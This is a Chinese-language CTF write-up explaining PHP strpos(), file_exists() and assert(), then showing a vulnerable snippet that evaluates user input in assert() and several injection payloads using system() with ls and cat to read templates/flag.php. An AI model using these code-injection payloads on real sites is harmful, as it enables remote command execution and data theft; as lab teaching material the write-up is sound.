strpos() 函数查找字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。
语法:strpos(string,find,start)
参数 描述
string 必需。规定要搜索的字符串。
find 必需。规定要查找的字符串。
start 可选。规定在何处开始搜索。
file_exists() 函数检查文件或目录是否存在
如果指定的文件或目录存在则返回 true,否则返回 false。
接下来我们构造payload即构造page
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
payload:?page=abc’) or system(“cat templates/flag.php”);//
$file =templates/ abc’) or system(“cat templates/flag.php”);// “.php”
因为在strpos中只传入了abc,所以其肯定返回false,在利用or让其执行system函数,再用" // "将后面的语句注释掉
查看网页源代码
strops:
返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE.
assert:**如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。
**
page没有通过任何过滤和处理,因此能够传递参数闭合strpos函数
设置page为’.system(“cat ./templates/flag.php”).’,查看源代码,可得到flag
分步理解 形成字符串
‘.system(“ls”).’
‘.system(“ls ./templates”).’
‘.system(“ls templates”).’
‘.system(“cat ./templates/flag.php”).’
必定要查看源代码,否则就亏大了!
ssert可以执行任意代码。
然后用括号给它闭合上,也就是$page=’)xxx;//
xxx就是要执行的代码,前面一个单引号和括号把之前的函数闭合,然后分号后面的两个斜杠注释掉后面的php代码。
我们下载下来的源码能够看到网站代码结构,index.php同级目录下有一个templates的文件夹,其中有flag.php(打开之后看不到),然后就试一下用system(“cat templates/flag.php”)。
输入page=’).system(“cat templates/flag.php”);//
右键查看源码,得到flag